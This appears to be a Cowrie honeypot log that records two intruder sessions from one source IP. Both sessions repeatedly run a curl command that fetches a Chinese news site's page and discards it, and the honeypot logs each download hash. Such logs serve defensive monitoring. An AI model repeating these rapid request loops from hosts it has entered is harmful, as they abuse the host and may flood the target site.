{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.142137Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.143340Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.159452Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.175408Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.176793Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.181047Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.182821Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.205436Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.207581Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.214874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.216113Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.221152Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.228317Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.234902Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.236087Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.252737Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.254295Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.273132Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.277164Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.282967Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.290867Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.293638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.295060Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.307079Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.314688Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.315997Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.325755Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.332528Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.333778Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.343089Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.346712Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.353387Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.354519Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.369084Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.370446Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.394977Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.403078Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.405097Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.407047Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.408928Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.413632Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.415441Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.446144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.447297Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.451037Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.452772Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.490305Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.491403Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.496290Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.497850Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.520601Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.528842Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.531785Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.532906Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.535536Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.536589Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.555877Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.569773Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.571081Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.574964Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.576349Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.595264Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.597465Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.600187Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.610858Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.612098Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.615577Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.617051Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.651493Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.652894Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.655967Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.657333Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.695116Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.702203Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.705240Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.723496Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.748158Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.749618Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.752744Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.754988Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.809572Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.811056Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.817357Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.818799Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.825914Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.877686Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.879071Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.883320Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
